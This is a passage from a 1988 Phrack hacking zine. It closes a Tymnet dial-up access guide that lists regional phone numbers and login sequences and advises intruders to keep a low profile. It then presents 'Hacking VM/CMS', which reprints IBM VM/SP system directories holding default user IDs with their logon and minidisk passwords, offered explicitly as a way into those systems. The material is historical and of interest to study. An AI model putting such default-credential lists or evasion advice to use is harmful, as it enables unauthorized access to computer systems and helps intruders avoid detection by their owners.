             . _. _. _< _C _R _> _            (SYNCHRONIZES DATA SPEEDS)

             WELCOME TO THE BPA/DST PDN

             *. _T _  _< _C _R _> _           (TYMNET ADDRESS)


             131069             (ADDRESS CONFIRMATION - TYMNET DNIC)
             COM                (CONFIRMATION OF CALL SET-UP)

             -GWY 0XXXX- TYMNET: PLEASE LOG IN:  (HOST # WITHIN DASHES)


                                  BELL SOUTH

  NODE    CITY                  STATE           DENSITY  ACCESS NUMBER MODEM
  -----   --------------------  --------------  ------   ------------  -----
  10207   ATLANTA               GEORGIA         300/1200 404/261-4633  @PLSK
  10207   ATHENS                GEORGIA         300/1200 404/354-0614  @PLSK
  10207   COLUMBUS              GEORGIA         300/1200 404/324-5771  @PLSK
  10207   ROME                  GEORGIA         300/1200 404/234/7542  @PLSK


    @PLSK  BELLSOUTH - NETWORK NAME IS PULSELINK


             (CONNECT MESSAGE)

             . _. _. _  _< _C _R _> _           (SYNCHRONIZES DATA SPEEDS)
                                (DOES NOT ECHO TO THE TERMINAL)
             CONNECTED
             PULSELINK

             1 _3 _1 _0 _6 _              (TYMNET ADDRESS)
                                (DOES NOT ECHO TO THE TERMINAL)

             PULSELINK: CALL CONNECTED TO 1 3106

             -GWY 0XXXX- TYMNET: PLEASE LOG IN:  (HOST # WITHIN DASHES)


                                 PACIFIC BELL

  NODE    CITY                  STATE           DENSITY  ACCESS NUMBER  NTWK
  -----   -------------------   --------------  ------   ------------   ----
  03306   BERKELEY              CALIFORNIA      300/1200 415-548-2121   @PPS
  06272   EL SEGUNDO            CALIFORNIA      300/1200 213-640-8548   @PPS
  06272   FULLERTON             CALIFORNIA      300/1200 714-441-2777   @PPS
  06272   INGLEWOOD             CALIFORNIA      300/1200 213-216-7667   @PPS
  06272   LOS ANGELES(DOWNTOWN) CALIFORNIA      300/1200 213-687-3727   @PPS
  06272   LOS ANGELES           CALIFORNIA      300/1200 213-480-1677   @PPS
  03306   MOUNTAIN VIEW         CALIFORNIA      300/1200 415-960-3363   @PPS
  03306   OAKLAND               CALIFORNIA      300/1200 415-893-9889   @PPS
  03306   PALO ALTO             CALIFORNIA      300/1200 415-325-4666   @PPS
  06272   PASADENA              CALIFORNIA      300/1200 818-356-0780   @PPS
  03306   SAN FRANCISCO         CALIFORNIA      300/1200 415-543-8275   @PPS
  03306   SAN FRANCISCO         CALIFORNIA      300/1200 415-626-5380   @PPS
  03306   SAN FRANCISCO         CALIFORNIA      300/1200 415-362-2280   @PPS
  03306   SAN JOSE              CALIFORNIA      300/1200 408-920-0888   @PPS
  06272   SANTA ANNA            CALIFORNIA      300/1200 714-972-9844   @PPS
  06272   VAN NUYS              CALIFORNIA      300/1200 818-780-1066   @PPS


    @PPS   PACIFIC BELL - NETWORK NAME IS PUBLIC PACKET SWITCHING (PPS)

             (CONNECT MESSAGE)

             . _. _. _< _C _R _             (SYNCHRONIZES DATA SPEEDS)>
                                (DOES NOT ECHO TO THE TERMINAL)

             ONLINE 1200
             WELCOME TO PPS:  415-XXX-XXXX
             1 _3 _1 _0 _6 _9 _             (TYMNET ADDRESS)
                                (DOES NOT ECHO UNTIL TYMNET RESPONDS)

         -GWY 0XXXX- TYMNET: PLEASE LOG IN:  (HOST # WITHIN DASHES)

                               SOUTHWESTERN BELL

  NODE    CITY                  STATE           DENSITY  ACCESS NUMBERS NWRK
  -----   --------------------  --------------  -------  ------------   -----
  05443   KANSAS CITY           KANSAS          300/1200 316/225-9951   @MRLK
  05443   HAYS                  KANSAS          300/1200 913/625-8100   @MRLK
  05443   HUTCHINSON            KANSAS          300/1200 316/669-1052   @MRLK
  05443   LAWRENCE              KANSAS          300/1200 913/841-5580   @MRLK
  05443   MANHATTAN             KANSAS          300/1200 913/539-9291   @MRLK
  05443   PARSONS               KANSAS          300/1200 316/421-0620   @MRLK
  05443   SALINA                KANSAS          300/1200 913/825-4547   @MRLK
  05443   TOPEKA                KANSAS          300/1200 913/235-1909   @MRLK
  05443   WICHITA               KANSAS          300/1200 316/269-1996   @MRLK


  04766   BRIDGETON/ST. LOUIS   MISSOURI        300/1200 314/622-0900   @MRLK
  04766   ST. LOUIS             MISSOURI        300/1200 314/622-0900   @MRLK


  06510   ADA                   OKLAHOMA        300/1200 405/436-0252   @MRLK
  06510   ALTUS                 OKLAHOMA        300/1200 405/477-0321   @MRLK
  06510   ALVA                  OKLAHOMA        300/1200 405/327-1441   @MRLK
  06510   ARDMORE               OKLAHOMA        300/1200 405/223-8086   @MRLK
  03167   BARTLESVILLE          OKLAHOMA        300/1200 918/336-6901   @MRLK
  06510   CLINTON               OKLAHOMA        300/1200 405/323-8102   @MRLK
  06510   DURANT                OKLAHOMA        300/1200 405/924-2680   @MRLK
  06510   ENID                  OKLAHOMA        300/1200 405/242-8221   @MRLK
  06510   LAWTON                OKLAHOMA        300/1200 405/248-8772   @MRLK
  03167   MCALESTER             OKLAHOMA        300/1200 918/426-0900   @MRLK
  03167   MIAMI                 OKLAHOMA        300/1200 918/540-1551   @MRLK
  03167   MUSKOGEE              OKLAHOMA        300/1200 918/683-1114   @MRLK
  06510   OKLAHOMA CITY         OKLAHOMA        300/1200 405/236-0660   @MRLK
  06510   PONCA CITY            OKLAHOMA        300/1200 405/762-9926   @MRLK
  03167   SALLISAW              OKLAHOMA        300/1200 918/775-7713   @MRLK
  06510   SHAWNEE               OKLAHOMA        300/1200 405/273-0053   @MRLK
  06510   STILLWATER            OKLAHOMA        300/1200 405/377-5500   @MRLK
  03167   TULSA                 OKLAHOMA        300/1200 918/583-6606   @MRLK
  06510   WOODWARD              OKLAHOMA        300/1200 405/256-9947   @MRLK




   @MRLK - SOUTHWESTERN BELL TELEPHONE- NETWORK NAME IS MICROLINK II(R)

             (CONNECT MESSAGE)
             (PLEASE TYPE YOUR TERMINAL IDENTIFIER)

             A _                  (YOUR TERMINAL IDENTIFIER)

             WELCOME TO MICROLINK II
             -XXXX:01-030-
             PLEASE LOG IN:
             .T < _C _R _> _            (USERNAME TO ACCESS TYMNET)


             HOST: CALL CONNECTED

             -GWY 0XXXX- TYMNET: PLEASE LOG IN:


                             SOUTHERN NEW ENGLAND

NODE    CITY                  STATE           DENSITY  ACCESS NUMBERS NWRK
-----   -------------------   -----------     -------  -------------- -----
02727   BRIDGEPORT            CONNECTICUT     300/2400 203/366-6972   @CONNNET
02727   BRISTOL               CONNECTICUT     300/2400 203/589-5100   @CONNNET
02727   CANAAN                CONNECTICUT     300/2400 203/824-5103   @CONNNET
02727   CLINTON               CONNECTICUT     300/2400 203/669-4243   @CONNNET
02727   DANBURY               CONNECTICUT     300/2400 203/743-2906   @CONNNET
02727   DANIELSON             CONNECTICUT     300/2400 203/779-1880   @CONNNET
02727   HARTFORD/MIDDLETOWN   CONNECTICUT     300/2400 203/724-6219   @CONNNET
02727   MERIDEN               CONNECTICUT     300/2400 203/237-3460   @CONNNET
02727   NEW HAVEN             CONNECTICUT     300/2400 203/776-1142   @CONNNET
02727   NEW LONDON            CONNECTICUT     300/2400 203/443-0884   @CONNNET
02727   NEW MILFORD           CONNECTICUT     300/2400 203/355-0764   @CONNNET
02727   NORWALK               CONNECTICUT     300/2400 203/866-5305   @CONNNET
02727   OLD GREDDWICH         CONNNETICUT     300/2400 203/637-8872   @CONNNET
02727   OLD SAYBROOK          CONNECTICUT     300/2400 203/388-0778   @CONNNET
02727   SEYMOUR               CONNECTICUT     300/2400 203/881-1455   @CONNNET
02727   STAMFORD              CONNECTICUT     300/2400 203/324-9701   @CONNNET
02727   STORRS                CONNECTICUT     300/2400 203/429-4243   @CONNNET
02727   TORRINGTON            CONNECTICUT     300/2400 203/482-9849   @CONNNET
02727   WATERBURY             CONNECTICUT     300/2400 203/597-0064   @CONNNET
02727   WILLIMANTIC           CONNECTICUT     300/2400 203/456-4552   @CONNNET
02727   WINDSOR               CONNECTICUT     300/2400 203/688-9330   @CONNNET
02727   WINDSOR LCKS/ENFIELD  CONNECTICUT     300/2400 203/623-9804   @CONNNET



    @CONNNET - SOUTHERN NEW ENGLAND TELEPHONE - NETWORK NAME IN CONNNET

     (CONNECT MESSAGE)

      H_ H_ <_ C_ R_>        (SYNCHRONIZES DATA SPEEDS)
                        (DOES NOT ECHO TO THE TERMINAL)
      CONNNET

     ._ T_ <_ C_ R_>_         (MUST BE CAPITAL LETTERS)

      26-SEP-88   18:33          (DATA)
      031069                     (ADDRESS CONFIRMATION)
      COM                        (CONFIRMATION OF CALL SET-UP)

      -GWY OXXXX-TYMNET: PLEASE LOG IN:

On a side note, the recent book The Cuckoo's Egg provides some interesting
information (in the form of a story, however) on a Tymnet hacker.  Remember
that he was into BIG things, and hence he was cracked down upon.  If you keep a
low profile, networks should provide a good access method.

If you can find a system that is connected to the Internet that you can get on
from Tymnet, you are doing well.
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 30, File #4 of 12


                     /===================================\n                     |                                   |
                     |          Hacking VM/CMS           |
                     |                                   |
                     |                                   |
                     |              by Goe               |
                     |                                   |
                     ===================================/


This file written by Goe (my nickname).  Any comments or criticisms or
corrections are welcomed.  Anyone with a good knowledge can modify this.

The article's topic is the IBM VM/SP running CMS and using DIRMAINT.  I do not
know if it works in MVS/TSO or VSE.

The first table contains the original default IDs & passwords from IBM Corp.

The second table contains those default IDs & passwords that IBM customized for
its customer.

===============================================================================

***************************************************************
*  3380      SYSTEM DIRECTORY                                 *
***************************************************************
*                                                             *
*      The addresses 123, 124, and 125 are virtual ad-        *
*      dresses.  The address 123 is critical since it is      *
*      used in DMKSYS, the directory, and the service en-     *
*      vironments of the Interactive Productivity Facil-      *
*      ity.  Do not change this address.  If you still want   *
*      to change it, remember it must be changed in           *
*      DMKSYS, all service environments, the 'DIRECTORY'      *
*      statement below, and in the 'MDISK' statements         *
*      found under the userid  'MAINT'.                       *
*                                                             *
*      NOTE:  Remember these are only virtual addresses       *
*      not real addresses, so there is no need to change      *
*      them to match your hardware addresses.  More in-       *
*      formation is contained in the system Installation      *
*      Guide.                                                 *
*                                                             *
***************************************************************
*
DIRECTORY 123  3380  VMSRES
*
***************************************************************
*      3380  SYSTEM RESERVED AREAS (NOT FOR MINIDISKS)        *
***************************************************************
*
USER $ALLOC$  NOLOG
 MDISK A01 3380 000 001 VMSRES R
 MDISK B01 3380 000 001 VMPK01 R
 MDISK E01 3380 000 001 VMPK04 R
 MDISK F11 3380 000 001 PROFPK R
 MDISK F21 3380 000 001 SQLPK  R
*
USER $TEMP$   NOLOG
 MDISK A09 3380 272 228 VMSRES R
 MDISK D09 3380 277 258 VMPK01
*
USER $TDISK$ NOLOG
 MDISK A08 3380 585 091 VMSRES R
*
USER $CPNUC$ NOLOG
 MDISK A02 3380 001 005 VMSRES R
*
USER $DIRECT$ NOLOG
 MDISK A03 3380 500 002 VMSRES R
*
USER $SAVSYS$ NOLOG
 MDISK A04 3380 006 011 VMSRES R
 MDISK B04 3380 012 056 VMPK01 R
*
USER $SYSERR$ NOLOG
 MDISK A06 3380 019 002 VMSRES R
*
USER $SYSCKP$ NOLOG
 MDISK A05 3380 271 001 VMSRES R
*
USER $SYSWRM$ NOLOG
 MDISK A07 3380 017 002 VMSRES R
*
***************************************************************
*             SYSTEM RELATED USERIDS                          *
***************************************************************
*
USER AUTOLOG1 NOLOG 512K 1M ABCDEG
 ACCOUNT 2 SYSTEM
 IPL CMS PARM AUTOCR
 CONSOLE 009 3215
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH  A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 19D 19D RR
 LINK MAINT 19E 19E RR
 MDISK 191 3380 093 001 VMPK01 MR RAUTOLOG WAUTOLOG MAUTOLOG
*
USER CMSBATCH NOLOG 1M 2M G
 ACCOUNT 3 SYSTEM
 OPTION ACCT
 IPL CMS PARM AUTOCR
 CONSOLE 009 3215
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH  A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 MDISK 195 3380 068 002 VMPK01 MR RBATCH   WBATCH   MBATCH
*
USER CMSUSER NOLOG 1M 3M G
 ACCOUNT 101 USER01
 IPL CMS
 CONSOLE 009 3215
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH  A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 19D 19D RR
 LINK MAINT 19E 19E RR
 MDISK 191 3380 089 003 VMPK01 MR RCMS     WCMS     MCMS
*
USER EREP NOLOG 768K 2M FG
 ACCOUNT EREP IBMCE
 IPL CMS
 CONSOLE 01F 3215
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 19D 19D RR
 LINK MAINT 19E 19E RR
 LINK MAINT 201 192 RR
 MDISK 191 3380 027 001 VMSRES WR READ     WRITE
*
USER GCS  NOLOG  5M 6M  G
 ACCOUNT GCS RECVM
 OPTION ECMODE DIAG98
 IPL GCS PARM AUTOLOG
 CONSOLE 009 3215
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH  A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 19D 19D RR
 LINK MAINT 595 595 RR
 LINK MAINT 59E 59E RR
 MDISK 191 3380 677 005 VMPK01 MR RGCS     WGCS     MGCS
*
USER IVPM1 NOLOG 3M   16M G
 ACCOUNT ACT4 IVPM1
 CONSOLE 009 3210
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 193 193 RR
 LINK MAINT 194 194 RR
 LINK MAINT 19D 19D RR
 MDISK 191 3380 883 001 VMSRES WR READ     WRITE
*
USER IVPM2 NOLOG  3M   4M G
 ACCOUNT ACT5 IVPM2
 CONSOLE 009 3210
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 193 193 RR
 LINK MAINT 194 194 RR
 LINK MAINT 19D 19D RR
 MDISK 191 3380 884 001 VMSRES WR READ     WRITE
*
USER MAINT CPCMS 16M 16M ABCDEFG
 ACCOUNT 1 SYSPROG
 OPTION ECMODE DIAG98
 IPL 190
 CONSOLE 009 3215
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH  A
 SPOOL 00E 1403 A
 MDISK 123 3380 000 885 VMSRES MW RSYSRES  WSYSRES  MSYSRES
 MDISK 124 3380 000 885 VMPK01 MW RSYSRES  WSYSRES  MSYSRES
 MDISK 127 3380 000 885 VMPK04 MW RSYSRES  WSYSRES  MSYSRES
 MDISK 129 3380 000 885 PROFPK MW RSYSRES  WSYSRES  MSYSRES
 MDISK 130 3380 000 885 SQLPK  MW RSYSRES  WSYSRES  MSYSRES
 MDISK 19D 3380 229 048 VMPK01 MW ALL      WMAINT   MMAINT
 MDISK 190 3380 502 037 VMSRES MW ALL      WMAINT   MMAINT
 MDISK 191 3380 144 010 VMSRES MW RMAINT   WMAINT   MMAINT
 MDISK 193 3380 117 027 VMSRES MW RMAINT   WMAINT   MMAINT
 MDISK 194 3380 044 027 VMSRES MW RMAINT   WMAINT   MMAINT
 MDISK 196 3380 028 016 VMSRES MW RMAINT   WMAINT   MMAINT
 MDISK 201 3380 767 023 VMSRES MW RMAINT   WMAINT   MMAINT
 MDISK 293 3380 790 027 VMSRES MW RCMSAUX  WCMSAUX  MCMSAUX
 MDISK 294 3380 862 021 VMSRES MW RCPAUX   WCPAUX   MCPAUX
 MDISK 295 3380 211 014 VMSRES MW RUSRMOD  WUSRMOD  MUSRMOD
 MDISK 296 3380 070 019 VMPK01 MW RCPAUX   WCPAUX   MCPAUX
 MDISK 319 3380 021 006 VMSRES MW ALL      WMAINT   MMAINT
 MDISK 393 3380 353 063 VMPK04 WR RMAINT   WMAINT
 MDISK 394 3380 416 076 VMPK04 WR RMAINT   WMAINT
 MDISK 396 3380 499 034 VMPK04 WR RMAINT   WMAINT
 MDISK 492 3380 664 011 VMPK01 MW RTSFOBJ  WTSFOBJ  MTSFOBJ
 MDISK 494 3380 864 011 VMPK01 MW RTSFAUX  WTSFAUX  MTSFAUX
 MDISK 496 3380 092 001 VMPK01 MW RIPCX    WIPCSX   MIPSX
 MDISK 497 3380 492 007 VMPK04 MW RMAINT   WMAINT
 MDISK 59E 3380 875 010 VMPK01 MW ALL      WMAINT   MMAINT
 MDISK 595 3380 682 031 VMPK01 MW RMAINT   WMAINT   MMAINT
 MDISK 596 3380 713 021 VMPK01 MW RGCSAUX  WGCSAUX  MGCSAUX
*
USER OLTSEP NOLOG 1M 1M FG
 ACCOUNT OLTSEP IBMCE
 OPTION REALTIMER ECMODE
 IPL 5FF
 CONSOLE 01F 3215
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH A
 SPOOL 00E 1403 A
 LINK MAINT 19D 19D RR
 MDISK 5FF 3380 000 885 CEPACK MR READ     WRITE
*
USER OPERATNS NOLOG 1M  2M BCEG
 ACCOUNT 13 SYSPROG
 IPL CMS
 CONSOLE 009 3215
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH  A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 19D 19D RR
 LINK MAINT 19E 19E RR
 MDISK 191 3380 154 001 VMSRES MR RIPCS    WIPCS    MIPCS
 MDISK 193 3380 201 008 VMSRES MR RIPCS    WIPCS    MIPCS
*
USER OPERATOR OPERATOR  3M 16M ABCDEFG
 ACCOUNT 2 OPERATOR
 CONSOLE 009 3215 T MAINT
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH  A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 19D 19D RR
 LINK MAINT 19E 19E RR
 MDISK 191 3380 209 002 VMSRES MR ROPER    WOPER    MOPER
*
USER SYSDUMP1 NOLOG 1M 1M BG
 ACCOUNT 16 SYSTEM
 IPL CMS
 CONSOLE 009 3215
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 19D 19D RR
 LINK MAINT 19E 19E RR
 MDISK 123 3380 000 885 VMSRES RR
 MDISK 124 3380 000 885 VMPK01 RR
 MDISK 127 3380 000 885 VMPK04 RR
 MDISK 129 3380 000 885 PROFPK RR
 MDISK 130 3380 000 885 SQLPK  RR
*
USER TSAFVM NOLOG 4M 8M G
 ACCOUNT 1 xxxxxx
 OPTION MAXCONN 256 BMX ECMODE COMSRV ACCT CONCEAL REALTIMER
 IUCV ALLOW
 IUCV *CRM
 IPL CMS PARM AUTOCR
 CONSOLE 009 3215 A OPERATOR
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 19D 19D RR
 LINK MAINT 19E 19E RR
 LINK MAINT 492 192 RR
 LINK MAINT 494 494 RR
 MDISK 191 3380 675 002 VMPK01 MR
DEDICATE 300 4A0
*

===============================================================================

***************************************************************
*  3380      SYSTEM DIRECTORY                                 *
***************************************************************
*                                                             *
*      The virtual address 123 is critical since it is        *
*      used in DMKSYS, the directory, and the service en-     *
*      vironments of the Interactive Productivity Facil-      *
*      ity.  Do not change this address.  If you still want   *
*      to change it, remember it must be changed in           *
*      DMKSYS, all service environments, the 'DIRECTORY'      *
*      statement below, and in the 'MDISK' statements         *
*      found under the userid  'MAINT'.                       *
*                                                             *
*      NOTE:  Remember these are only virtual addresses       *
*      not real addresses, so there is no need to change      *
*      them to match your hardware addresses.  More in-       *
*      formation is contained in the system Installation      *
*      Guide.                                                 *
*                                                             *
***************************************************************
*
DIRECTORY 123 3380 VMSRES
*
***************************************************************
*    EXPRESS STANDARD PROFILE FOR GENERAL PURPOSE USERIDS     *
***************************************************************
*
PROFILE EXPPROF
 IPL CMS PARM AUTOCR
 CONSOLE 009 3215
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH  A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 19D 19D RR
 LINK MAINT 19E 19E RR
*
***************************************************************
*      3380  SYSTEM RESERVED AREAS (NOT FOR MINIDISKS)        *
***************************************************************
*
USER $ALLOC$  NOLOG
 MDISK A01 3380 000 001 VMSRES R                                       03131808
 MDISK A02 3380 000 001 VMGCS1 R                                       03131808
 MDISK A05 3380 000 001 VMPK01 R                                       03131808
 MDISK A06 3380 000 001 VMSTGE R                                       03131808
 MDISK A07 3380 000 001 PROFPK R                                       03131808
 MDISK A08 3380 000 001 SQLPK  R                                       03131808
 MDISK A09 3380 000 001 VMPK02 R                                       03131808
 MDISK A0A 3380 000 001 EDMD01 R                                       03131808
*
USER $TEMP$   NOLOG
 MDISK B01 3380 392 100 VMSRES R                                       03131808
 MDISK B02 3380 392 100 VMPK01 R                                       03131808
*
USER $TDISK$ NOLOG
 MDISK C01 3380 358 033 VMSRES R                                       03131808
 MDISK C02 3380 492 022 VMPK01 R                                       03131808
*
USER $CPNUC$ NOLOG
 MDISK D01 3380 001 005 VMSRES R                                       03131808
*
USER $DIRECT$ NOLOG
 MDISK E01 3380 492 002 VMSRES R                                       03131808
*
USER $SAVSYS$ NOLOG
 MDISK F01 3380 006 011 VMSRES R                                       03131808
 MDISK F02 3380 012 060 VMPK01 R                                       03131808
*
USER $SYSERR$ NOLOG
 MDISK F03 3380 019 002 VMSRES R                                       03131808
*
USER $SYSCKP$ NOLOG
 MDISK F04 3380 391 001 VMSRES R                                       03131808
*
USER $SYSWRM$ NOLOG
 MDISK F05 3380 017 002 VMSRES R                                       03131808
*
***************************************************************
*             SYSTEM RELATED USERIDS                          *
***************************************************************
*
USER AUTOLOG1 AUTOLOG1 512K 1M ABCDEG
INCLUDE EXPPROF
 ACCOUNT 2 SYSTEM
 MDISK 191 3380 094 001 VMPK01 MR RAUTOLOG WAUTOLOG MAUTOLOG           03131808
*
USER CMSBATCH CMSBATCH 1M 2M G
 ACCOUNT 3 SYSTEM
 OPTION ACCT
 IPL CMS PARM AUTOCR
 CONSOLE 009 3215
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH  A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 MDISK 195 3380 095 002 VMPK01 MR RBATCH   WBATCH   MBATCH             03131808
*
USER CMSUSER CMSUSER 1M 3M G
INCLUDE EXPPROF
 ACCOUNT 101 USER01
 MDISK 191 3380 091 003 VMPK01 MR RCMS     WCMS     MCMS               03131808
*
USER EREP EREP 768K 2M FG
INCLUDE EXPPROF
 ACCOUNT EREP IBMCE
 LINK MAINT 201 192 RR
 MDISK 191 3380 021 001 VMSRES WR READ     WRITE                       03131808
*
USER GCS  GCS  5M 6M  G
 ACCOUNT GCS RECVM
 OPTION ECMODE DIAG98
 IPL GCS PARM AUTOLOG
 CONSOLE 009 3215
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH  A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 19D 19D RR
 LINK MAINT 595 595 RR
 LINK MAINT 59E 59E RR
 MDISK 191 3380 514 005 VMPK01 MR RGCS     WGCS     MGCS               03131808
*
USER IVPM1 IVPM1 3M   16M G
 ACCOUNT ACT4 IVPM1
 CONSOLE 009 3210
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 193 193 RR
 LINK MAINT 194 194 RR
 LINK MAINT 19D 19D RR
 MDISK 191 3380 868 001 VMSRES WR READ     WRITE                       03131808
*
USER IVPM2 IVPM2  3M   4M G
 ACCOUNT ACT5 IVPM2
 CONSOLE 009 3210
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 193 193 RR
 LINK MAINT 194 194 RR
 LINK MAINT 19D 19D RR
 MDISK 191 3380 869 001 VMSRES WR READ     WRITE                       03131808
*
USER MAINT CPCMS 6M 16M ABCDEFG
 ACCOUNT 1 SYSPROG
 OPTION ECMODE DIAG98
 IPL CMS
 IUCV *CCS P M 10
 IUCV ANY P M 0
 CONSOLE 009 3215
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH  A
 SPOOL 00E 1403 A
*
 MDISK 123 3380 000 885 VMSRES MW RSYSRES  WSYSRES  MSYSRES            03131808
 MDISK 124 3380 000 885 VMPK01 MW RSYSRES  WSYSRES  MSYSRES            03131808
 MDISK 126 3380 000 885 VMSTGE MW RSYSRES  WSYSRES  MSYSRES            03131808
 MDISK 127 3380 000 885 VMGCS1 MW RSYSRES  WSYSRES  MSYSRES            03131808
 MDISK 129 3380 000 885 PROFPK MW RSYSRES  WSYSRES  MSYSRES            03131808
 MDISK 130 3380 000 885 SQLPK  MW RSYSRES  WSYSRES  MSYSRES            03131808
 MDISK 131 3380 000 885 VMPK02 MW RSYSRES  WSYSRES  MSYSRES            03131808
*
* 19D - Help files
* 39D - Help files for NLS
* 19E - CMS extension disk. Most program products go here
* 190 - CMS nucleus and commands
* 191 - MAINT work disk and system dependent files
* 193 - CMS text / IPCS text / GCS interface texts
* 194 - CP text files and Maclibs
* 196 - HPO text files and Maclibs
* 201 - EREP files
* 293 - Aux and update files for CMS service
* 294 - Aux and update files for CP service
* 295 - CP/CMS EXPRESS/local service
* 296 - HPO aux and update files for service
* 3A0 - IPF online documentation
* 300 - VM/IPF system support, administration and operation dialogs
* 301 - IPF VM/VSE feature files
* 31A - Customer procedures and products not from VM/EXPRESS
* 310 - Maclibs for VM/IPF
* 319 - Some optional Program Products
* 393 - CMS source
* 394 - CP SOURCE
* 396 - HPO source
* 492 - TSAF
* 494 - TSAF
* 496 - IPCS service files
* 497 - IPCS source files
* 59E - GCS System disk extension
* 595 - GCS object code
* 596 - GCS service files
*
 MDISK 19D 3380 308 025 VMSRES MW ALL      WMAINT   MMAINT             03131808
 MDISK 39D 3380 333 025 VMSRES MW ALL      WMAINT   MMAINT             03131808
 MDISK 19E 3380 245 147 VMPK01 MR RMAINT   WMAINT   MMAINT             03131808
 MDISK 190 3380 494 037 VMSRES MW ALL      WMAINT   MMAINT             03131808
 MDISK 191 3380 088 010 VMSRES MW RMAINT   WMAINT   MMAINT             03131808
 MDISK 193 3380 061 027 VMSRES MW RMAINT   WMAINT   MMAINT             03131808
 MDISK 194 3380 022 027 VMSRES MW RMAINT   WMAINT   MMAINT             03131808
 MDISK 196 3380 684 016 VMSRES MW RMAINT   WMAINT   MMAINT             03131808
 MDISK 201 3380 567 023 VMSRES MW RMAINT   WMAINT   MMAINT             03131808
 MDISK 293 3380 590 027 VMSRES MW RCMSAUX  WCMSAUX  MCMSAUX            03131808
 MDISK 294 3380 663 021 VMSRES MW RCPAUX   WCPAUX   MCPAUX             03131808
 MDISK 295 3380 531 014 VMSRES MW RUSRMOD  WUSRMOD  MUSRMOD            03131808
 MDISK 296 3380 072 019 VMPK01 MW RCPAUX   WCPAUX   MCPAUX             03131808
 MDISK 3A0 3380 128 001 VMPK01 MR ALL      WMAINT   MMAINT             03131808
 MDISK 300 3380 097 015 VMPK01 MR ALL      WMAINT   MMAINT             03131808
*MDISK 301 3380 001 049 EDMD01 MW ALL      WMAINT   MMAINT             03131808
 MDISK 31A 3380 870 003 VMSRES MW ALL      WMAINT   MMAINT             03131808
 MDISK 310 3380 112 016 VMPK01 MR ALL      WMAINT   MMAINT             03131808
 MDISK 319 3380 617 015 VMSRES MW ALL      WMAINT   MMAINT             03131808
 MDISK 393 3380 001 063 VMSTGE WR RMAINT   WMAINT                      03131808
 MDISK 394 3380 064 076 VMSTGE WR RMAINT   WMAINT                      03131808
 MDISK 396 3380 147 034 VMSTGE WR RMAINT   WMAINT                      03131808
 MDISK 492 3380 195 011 VMPK01 MW RTSFOBJ  WTSFOBJ  MTSFOBJ            03131808
 MDISK 494 3380 721 011 VMSRES MW RTSFAUX  WTSFAUX  MTSFAUX            03131808
 MDISK 496 3380 782 001 VMPK01 MW RIPCX    WIPCSX   MIPSX              03131808
 MDISK 497 3380 140 007 VMSTGE MW RMAINT   WMAINT                      03131808
 MDISK 59E 3380 181 010 VMPK01 MW ALL      WMAINT   MMAINT             03131808
 MDISK 595 3380 214 031 VMPK01 MW RMAINT   WMAINT   MMAINT             03131808
 MDISK 596 3380 700 021 VMSRES MW RGCSAUX  WGCSAUX  MGCSAUX            03131808
*
* 29E - 5748-RC1 (PVM) - 5748-XP1 (RSCS V1) - Update files
* 36E - 5748-RC1 PVM 191 disk
* 39E - 5748-RC1 (PVM) - 5748-XP1 (RSCS V1) - Source files
* 49E - 5748-RC1 (PVM) - 5748-XP1 (RSCS V1) - Text files
*
 MDISK 29E 3380 785 007 VMPK01 MR RMAINT   WMAINT   MMAINT             03131808
 MDISK 36E 3380 563 004 VMSRES RR RMAINT   WMAINT   MMAINT             03131808
 MDISK 39E 3380 181 045 VMSTGE WR RMAINT   WMAINT                      03131808
 MDISK 49E 3380 792 007 VMPK01 MR RMAINT   WMAINT   MMAINT             03131808
*
* 348 - EP - ACF/NCP - NETVIEW - ACF/VTAM - ACF/SSP (VMFPARM DISK)
*
 MDISK 348 3380 001 002 VMGCS1 MR RMAINT   WMAINT   MMAINT             03131808
*
* 298 - 5664-280 VTAM 191
* 299 - 5664-280 VTAM Base disk
* 29A - 5664-280 VTAM Run disk
* 29B - 5664-280 VTAM Merge disk
* 29C - 5664-280 VTAM Zap disk
* 29D - 5664-280 VTAM Delta disk
*
